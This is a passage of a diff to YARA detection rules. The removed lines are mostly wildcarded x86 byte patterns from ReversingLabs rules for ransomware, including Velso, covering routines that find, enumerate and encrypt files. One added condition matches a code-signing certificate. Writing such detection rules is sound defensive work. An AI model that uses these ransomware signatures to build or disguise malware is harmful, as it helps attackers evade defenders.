-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? FF 70 ?? 8B 40 ?? 83 E0 ?? 50 8D 84 24 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? C6 44 24 ?? ?? 8B 56 ??
-            F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66
-            A1 ?? ?? ?? ?? 66 89 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 0F 1F 44 00 ?? 8A 41 ?? 8D
-            49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ??
-            88 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 0F 1F 00 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
-            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ??
-            88 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ??
-            89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 66 0F 1F 44 00 ??
-            8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F6
-        }
-		$enum_resources_1_p3 = {
-            C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ??
-            ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F6 C2 ?? 74 ?? 8D
-            4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66
-            89 41 ?? 84 D2 79 ?? 8D 4C 24 ?? 49 0F 1F 40 ?? 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
-            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66
-            89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
-            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41
-            ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
-            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66
-            89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D
-            49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41
-            ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
-            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? F7 C2 ?? ?? ?? ?? 74
-        }
-		$enum_resources_2_p1 = {
-            8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ??
-            ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ??
-            74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ??
-            ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ??
-            8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ??
-            ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01
-            66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C
-            24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89
-            41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ??
-            ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A
-            41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2
-            ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01
-            A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ??
-            ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89
-        }
-		$enum_resources_2_p2 = {
-            01 A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D
-            4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66
-            89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
-            ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49
-            8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7
-            C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89
-            01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 85 D2 79
-            ?? 8D 4C 24 ?? 49 66 0F 1F 44 00 ?? 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89
-            01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ??
-            ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0
-            75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? 8D 4C 24 ?? 8D 51 ?? 8A 01
-            41 84 C0 75 ?? 2B CA 56 88 44 0C ?? FF D7 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 8D
-        }
-		$enum_resources_2_p3 = {
-            84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? FF D7 8B BC 2C ?? ?? ?? ?? 33 D2
-            8B CF 8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 43 ?? 03 C1 74 ?? 8B 6C 24 ?? 8B DF 8B
-            CB 42 8D 71 ?? 0F 1F 00 8A 01 41 84 C0 75 ?? 2B CE 8D 45 ?? 03 C1 3B D0 72 ?? 8B 6C
-            24 ?? 8B 5C 24 ?? 8B CF 33 D2 8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 43 ?? 03 C1 74
-            ?? 8B 9C 2C ?? ?? ?? ?? 8B 6C 24 ?? 0F 1F 40 ?? 8B CB 42 8D 71 ?? 8A 01 41 84 C0 75
-            ?? 2B CE 8D 45 ?? 03 C1 3B D0 72 ?? 8B 6C 24 ?? 8B 5C 24 ?? 33 D2 8D 4F ?? 8A 07 47
-            84 C0 75 ?? 2B F9 8D 43 ?? 03 C7 74 ?? 8B BC 2C ?? ?? ?? ?? 0F 1F 40 ?? 8B C7 42 8D
-            70 ?? 8A 08 40 84 C9 75 ?? 2B C6 40 03 C3 3B D0 72 ?? 8B 3D ?? ?? ?? ?? 8B 74 24 ??
-            83 EE ?? 89 74 24 ?? 0F 85 ?? ?? ?? ?? 8B 6C 24 ?? 8B F5 C1 E6 ?? 8B 84 34 ?? ?? ??
-            ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA
-        }
-		$enum_resources_2_p4 = {
-            8D 79 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CF D1 F9 51 52 8D 4C 24 ?? E8 ?? ?? ??
-            ?? 8D 44 24 ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 94 34 ?? ?? ?? ??
-            66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 79 ?? 0F 1F 44 00 ?? 66 8B 01 83 C1 ?? 66 85
-            C0 75 ?? EB ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 79 ?? 66
-            8B 01 83 C1 ?? 66 85 C0 75 ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ??
-            ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 E9
-            ?? ?? ?? ?? 8B CA 8D 79 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? E9 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? F6 84 34 ?? ?? ?? ?? ?? 74 ?? 8D
-            8C 24 ?? ?? ?? ?? 8D 53 ?? 03 CE E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 45 89 6C 24 ?? 3B
-            6C 24 ?? 0F 82 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 33 F6 8B 44 24 ?? 83 F8 ??
-            72 ?? 8B 4C 24 ?? 40 3D ?? ?? ?? ?? 77 ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75 ??
-            8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ?? 83
-            C4 ?? 5F 8B C6 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $encrypt_files_p* ) ) and ( $find_files ) and ( all of ( $enum_resources_1_p* ) ) and ( all of ( $enum_resources_2_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\"SMART GREY\" LLC" and pe.signatures [ i ] . serial == "3b:e6:30:83:fb:b1:78:7b:44:5d:a9:75:83:72:14:19" and 1493942400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Velso : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects Velso ransomware."
-		author = "ReversingLabs"
-		id = "72c7baaa-4f83-54c5-ba71-2b45e5eeefd2"
-		date = "2020-06-26"
-		modified = "2020-07-15"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Velso.yara#L1-L230"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "602be848a26106a1bd46cfc515578f0628687e6cb352e609a274220a61bcb620"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Velso"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$find_files_p1 = {
-            55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? 89 A5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 89 04 24 E8 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? C9 C3 C7 04 24 ?? ?? ?? ?? 8B 4D ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ??
-            ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ??
-            ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ??
-            85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ??
-            ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ??
-            C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? C7 04
-            24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0 51 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ??
-            ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0 52 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ??
-            E8 ?? ?? ?? ?? 85 C0 51 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ??
-            ?? 85 C0 52 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ??
-            ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 4D ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89
-            04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ??
-            89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24
-        }
-		$find_files_p2 = {
-            8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 52 52 8D 95
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ??
-            EB ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 52 52 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 51 51 74 ??
-            8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 52 52 74 ??
-            F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 4D ?? 89 85 ?? ?? ?? ??
-            8B 45 ?? 8B 51 ?? 8D 8D ?? ?? ?? ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51 51 89 44 24 ?? 8B 45 ?? 89 44 24
-            ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89 04
-            24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 0F 84 ?? ?? ?? ?? 89 04
-            24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ??
-            8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89
-            44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
-            ?? 83 C5 ?? 83 BD ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 0F 87 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8
-        }
-		$enum_resources_p1 = {
-            55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 EC ?? 85 C0 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45
-            ?? C9 C2 ?? ?? 8B 45 ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 EC ?? 85 C0 89 85 ?? ?? ?? ?? 74 ?? 90 8D B4 26 ?? ?? ?? ?? 8B 45 ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 55 ??
-            89 54 24 ?? 8B 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7
-            45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7
-            45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ??
-            85 C0 0F 94 C0 0F B6 C0 89 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B
-        }
-		$enum_resources_p2 = {
-            85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 45 ?? EB ?? 8B 45 ?? 8B 40 ?? 89 85
-            ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 83 45 ?? ?? 8B
-            85 ?? ?? ?? ?? 39 45 ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 8D 45 ?? 8B 4D
-            ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ??
-            89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 0F 84
-            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 8D 45 ?? 8B
-            4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 8B 40 ?? 89 C2 89 85 ?? ?? ?? ?? 8D 45
-            ?? 85 D2 89 45 ?? B8 ?? ?? ?? ?? 74 ?? 89 14 24 E8 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 89
-            44 24 ?? 8B 85 ?? ?? ?? ?? 8D 4D ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D
-            55 ?? 39 D0 0F 84 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9
-        }
-		$encrypt_files_p1 = {
-            55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ??
-            C6 45 ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6
-            45 ?? ?? C7 45 ?? ?? ?? ?? ?? 03 48 ?? 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 01 C7 04 24 ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 EC ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 4D ?? 83 EC ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 8B 51 ?? 8D
-            8D ?? ?? ?? ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 8D 8D ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 03 48 ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 EC ?? 39 D0
-            74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B
-        }
-		$encrypt_files_p2 = {
-            40 ?? 89 44 24 ?? 8B 45 ?? 8B 00 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? A1 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C9 C3 03 48 ?? 8B 41 ?? 83 C8 ?? 89 04 24 C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? 03 48 ?? 8B 41 ?? 83 C8 ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 EC ?? E9 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C5 ?? 83 BD ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 77 ?? 8B 85
-            ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 0F 0B 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74
-            ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D
